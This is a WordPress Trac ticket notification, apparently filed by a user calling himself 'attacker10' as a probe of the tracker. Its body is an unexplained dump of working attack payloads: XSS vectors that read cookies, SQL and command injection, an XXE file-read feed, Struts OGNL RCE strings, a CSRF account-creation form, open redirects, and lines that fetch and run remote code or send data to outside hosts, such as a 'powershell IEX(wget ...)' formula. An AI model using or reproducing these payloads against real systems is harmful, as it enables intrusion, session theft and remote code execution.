[wp-trac] [WordPress Trac] #47764: test
WordPress Trac
noreply at wordpress.org
Tue Jul 23 08:36:14 UTC 2019
#47764: test
-------------------------+-------------------------------------------------
Reporter: attacker10 | Owner: (none)
Type: defect | Status: new
(bug) |
Priority: normal | Milestone: Awaiting Review
Component: General | Version:
Severity: normal | Keywords: <noscript><p title="</noscript><img
Focuses: | src=x onerror=alert(1)>">
-------------------------+-------------------------------------------------
'*CONVERT(INT,@@version*)'
<svg onload=prompt(1)>
<html>
<body>
<form method="post"
action="http://localhost/{PACH}/admin/usuario.php?action=incluir">
<input type="hidden" name="user_login" value="ali">
<input type="hidden" name="user_password" type="hidden"
value="123456" >
<input type="hidden" name="user_email" value="">
<input type="submit" value="create">
</form>
</body>
</html>
%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2
<img src=x onerror=alert(1)>
"><script>alert("Johto.Robbie")</script>
<script>confirm(document.cookie)</script>
"><img src=x onerror=alert('1')>
<script>alert(1)</script>
javascript:alert(document.domain)
<img class="emoji" alt="??" src="x" /><svg onload=prompt(document.domain)>
<img src=x onerror=alert(5)>
https://console.cloud.google.com/home/dashboard?project=;ping google.com
https://console.cloud.google.com/home/dashboard?project=;cat /etc/passwd
’border:solid’onmouseover=’javascript:alert(document.domain)’x
<a href="javascript:alert(1);">XSS</a>
</script><script>alert('xss')</script>
xss%23%3Cbody%09onload=confirm%28String.fromCharCode%2888,83,83%29%29%3E
'"><img src=x onerror=alert(document.domain)>
<a onclick="alert(document.domain);">/
auth_code=,%20alert(123));//&auth_type=phone\
[Click here](javascript:alert(1))
"></script><svg/onload=alert("document.cookie")>
site:hk.*.yahoo.com+inurl:"id"+filetype:html
<<a></a>body onload=alert(1)>
[img]aaaa%20"onmouseover=alert(String.fromCharCode(80,101,114,115,105,115,116,101,110,116,32,88,83,83,32,111,110,32,112,111,114,110,104,117,98,46,99,111,109));>bb[img]http://www.pornhub.com[/img][/img]
{meme, src= http://dummy//onerror=eval(prompt(1))// }
"><img src="x" onerror=alert(cookie)>.png
'<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\'X\S\S\')\>'
1.jpg'onload='alert("xss")'
100');alert('XSS
https://xss-
game.appspot.com/level6/frame#data:text/javascript,alert('XSS')
{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}
>'>"><img src=x onmouseover =prompt(document.domain)>
"><body onload=alert('XSS')>
'"><img src=x onerror=alert(document.domain)>.txt
<a title='[vimeo 123]’>abc</a>
RCE:http://XXX.XXX.XXX.XXX:8080/Struts2_3_18/hello.action?cmd=gedit&method:(%23_memberAccess).setExcludedClasses(@java.util.Collections at EMPTY_SET),(%23_memberAccess).setExcludedPackageNamePatterns(@java.util.Collections at EMPTY_SET),%23cmd%3d%23parameters.cmd,%23a%3dnew%20java.lang.ProcessBuilder(%23cmd).start().getInputStream(),new
java.lang.String
/wp-
includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=alert`1`
t" onmouseover=alert(document.domain); a='
{1} + {1}
{% Pour c dans [1,2,3]%} {{c, c, c}} {% endfor%}
{{__.__ sous-classes de base __.__ [] .__ classe __ ()}}
'-confirm(1)-'
</script><script>confirm(document.domain)</script>
wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz
||UTL_HTTP.request(‘testerserver.com:80’||(SELECT user FROM DUAL)--
$(sleep 20)
{{'a'.constructor.prototype['char\u0041t']=''.concat;
$eval("x='\"+(y='if(!window\\u002?x)alert(window\\u002ex=1)')+eval(y)+\"'");}}
'+/"/+/onmouseover=1/
</script><svg/onload=
{{1+1}}
<script>x = '',__defineSetter__('x',alert),x=1,'';</script>
?kxsrc=https%3A//beacon.krxd.net/optout_check%3Fcallback%3Dalert%28/XSSED/.source%29
markdown xss issue site:github.com
%20"><"<img src="x">%20%20>"<iframe src=a>%20<iframe>
"><script>alert(document.cookie);</script>
../../../../../../../../../../etc/passwd
%0D%3C%2Fscript%3E%3Cscript%3E%24%2Eget%28unescape%28%2Fhttps%253A%252F%252Flastpass%252Ecom%252Fsettings%252Ephp%253Fextjs%253D1%2F%2Esource%29%2Cfunction%28x%29%7By%3Dx%2Ematch%28%2Fvalue%3D%2E%28%5B%5E%3E%5D%2B%29%5B%5E%3E%5D%2F%29%3Balert%28y%5B1%5D%29%3B%7D%29%3B%3C%2Fscript%3E%3Cscript%3E%22
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
<author>author at example.com</author>
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
"><img src=x onerror=prompt('XSSP')>
'|alert('XSS')|'
"><iframe/src=javascript:alert(document.cookie)>
#<svg onload="alert(1)">
{"!=", ""}
"/><svg/onload=prompt(1)>
javascript://google.com/?x=%0Aalert`Hello!`
daTa:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%23
https://google.com/”onmouseover=’alert(31337);’style=”font-size:100;
background:black”.
><a fooooooooooooooooooooooooooooooooo
href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>
[click this
link](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
javascript%3A%2F%2F"><script>alert(document.domain)</script>
<script>alert(1);//
<a href="javascript://%0Aalert(document.cookie)//http://">Click</a>
image/<img src=a onerror=prompt(document.domain)>;
and 1=2
X-Forwarded-Host
</script><script>alert(8)</script>
@SUM(1+2+3)*cmd|'/C powershell IEX(wget 0r.pe/p)'!A0
{{constructor.constructor("alert(1)")()}}
javascript://www.baidu.com/research?%0Aprompt(1)
javascript://www.baidu.com/research?%0Afunction%20reqListener%20()%20%7B%0A%
20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%
20new%20XMLHttpRequest()%3B%0AoReq.addEventListener(%
22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%
20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send()%3B
--></script><script>alert('1')</script>
//blackfan.ru/
crlftest%0dSet-Cookie:test=test;domain=.vimeopro.com
</textarea><script>alert(1)</script>
"onmouseover="confirm(1)"
'-alert(2)-'
{{ '7'*7 }}
{{1+1}}
7Q5US
%27-alert(1)-%27
"></title></script><script>alert(/OPENBUGBOUNTY/)</script>
</script><script>alert(1)</script>
%00%00error%3A%3C%2fstrong%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2fscript%3E%00%3B
"></script><img src=x onerror=prompt(document.cookie)>
/#!javascript::alert(document.domain);
NADER""img src=y onerror=confirm(document.domain)
@";onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-
update-form').submit();"class="modal-overlay"/
utm_campaign=tttttt%27%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E&utm_medium=top&utm_source=website'''
//youtube.com/%2F%2e%2e
//google.com/%2f..
\.companyx.com
//blackfan.ru/%2f../
/%0a.example.com/
///;@inexistantdomain.com
'-alert(document.domain)-'
javascript://http://google.com.?a%0avar
x=document.createElement('script');x.src='https://myhost/script.js';document.body.appendChild(x);
javascript:alert(document.domain);//http://
"><a href="https://google.com">test</a>
http://uber.com//216.58.217.206/calendar
);}catch(e)%20{alert(document.cookie);}//
callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)//
javascript%3aalert%28%2fhello+world%2f%29%3b%2f%2f
<sVg/oNloAd=//><sVg/oNloAd=alert("XSS2")//>
" onmouseover="alert('XSS on yahoo.com')"
style="position:fixed%3Bleft:0%3Btop:0%3Bwidth:9999px%3Bheight99px
https://xxssaa-2.myshopify.com/admin/apps/shopify-
widgets/v4/embeds/new?hmac=80cb2e192f782afcfc22721fe9b3ad6c21b2f96a1a490ad1d3a0f111d76fab46&id=357786310&protocol=https%3A%2F%2F&resource=collection&shop=xxssaa-2.myshopify.com×tamp=1480543073
<a href="http://[url=http://www.pornhub.com/"
onmouseover="alert(document.domain)" ]http:="" a="" "[="" url]"=""
target="_blank">http://[url=http://www.pornhub.com/"/onmouseover="alert(document.domain)"/]http://a/"[/url]</a>
/api/v1/session/?limit=1&offset=1313706&format=json
'"--></style></scRipt><scRipt>alert(1)</scRipt>
%27-alert(document.cookie)-%27
https://labs.bitdefender.com/wp-
includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=alert`1`
Content-Type:
%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘X
-Ack-Th3g3nt3lman-POC’,4*4)}.multipart/form-data
.htpasswd
/#3617'><script>alert(1)</script>
/#1='-alert(1)-'"-alert(1)-"
https://a/b.jpg?a><script>alert('hello');</script>
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
/en/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
http://www.mapnagenerator.com/en/SitePages/Forms/AllPages.aspx?RootFolder=%2fen%2fSitePages%2fForms&FolderCTID=[ns](javascript:alert(0x002F82);)
/wp-content/themes/.git/config
https://www.codegists.com/code/example-yahoo.com/
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
http://172.217.28.210/
http://186.232.200.252/csb9fa81e8/config/log_off_page.htm
D9824-advanced multiple decryption receiver
2008-2017 Cisco Systems Inc. All rights reserved
https://gerrit-review.googlesource.com/?polygerrit=0#/admin/
https://git.slackbuilds.org/slackbuilds/
https://vk.com/away.php?to=https://www.google.com/accounts/ServiceLogin?service=wise&passive=1209600&continue=https://spreadsheets.google.com/ccc?key%3D0ArbwB77NyOfrdF9CcWlKVFlnXzVzTUVCcTNTdjM2Qmc%26hl%3Dru%26pref%3D2&followup=https://spreadsheets.google.com/ccc?key%3D0ArbwB77NyOfrdF9CcWlKVFlnXzVzTUVCcTNTdjM2Qmc%26hl%3Dru%26pref%3D2&hl=ru&post=5962120_230
inurl:/ServiceLogin?service=
https://accounts.google.com/o/oauth2/auth?access_type=offline&client_id=166767483091-dqg60nnk79vk67bakqpf3f16ggjol41j.apps.googleusercontent.com&hd=shopify.com&redirect_uri=https%3A%2F%2Fexperiments.shopify.com%2Fauth%2Fgoogle_oauth2%2Fcallback&response_type=code&scope=email+profile&state=9a3e7afdc70be4bf3b8ab94d8048ddc284854dd013e82109&from_login=1&as=-21c1f907703dd32a&pli=1&authuser=0
chkdsk" download="setup.bat">Download</a>;
<img src="#[0xC2]"> "onerror="alert(1)"<br />
<img src="#>" onerror="alert(1)"<br />
https://www.lri.fr/~paulin/Logique/
<svg%0donload=alert(0)>
https://34.195.71.44/
<script>x=new
XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
http://c0d3g33k.blogspot.in/2017/11/story-of-json-xss.html
%252f..%252f..%252flogout&state=state">Click to
leak</a>alert(location.hash)
http://mail.aramta.com/web/download/downloadfile5.php?filesrc=//opt/lua/lib/liblua.la&path=//opt/lua/lib
https://leadslide.com/shopify/templates/LeadSlide%20Marketing/config.yml
'"><svg/onload=console.log(/xss_at_image_inject_appid/)><'"
) and (<column_name>=<column_name>
"><%2fscript><script>alert(document.domain)<%2fscript>
<style>
#test{
background-image:url('//\27\29\3Bcw:;a:\')\3b\3C/style/\20;a:\28\27\27');
background-image:url('//\27\29\3Bcw:;a:\')\3b>;a:\28\27\27');
}
#p{
background-
image:url('//\27\29\3Bcw:;a:\')\3b<img/src=\'dfdfd\'//onerror=\'alert(document.cookie)\'>;a:\28\27\27');
}
</style></style>
"a%00${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil at class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X
-Struts-Exploit-Test','GDSTEST'))}”
%3E%3Cscript%3Ealert%281%29%3C/script%3E
%0D%0AX-Accel-Redirect%3A%20/secret/flag
<scr<script>ipt>alert(1)</scr</script>ipt>
"><IMG src=x onerror=prompt(1);>"">><marquee><img src=x
onerror=confirm(3)></marquee>"/
"><svg/onload=alert(document.domain)>"@x.y
/RichText/check_auth.php
"><img+src%3Dx+onerror\%3Dalert('OnxxxFilterBypass')>
"%20onmouseover="alert(%27XSS%27)"%20style="font-size:%201001pt;"
<option/><select/><img src=xx: onerror=alert('bored-engineer')>
"><svg/onload=alert(2)>
{{{
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
}}}
{{{
[[Image([[Image()]])]]
}}}
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47764>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list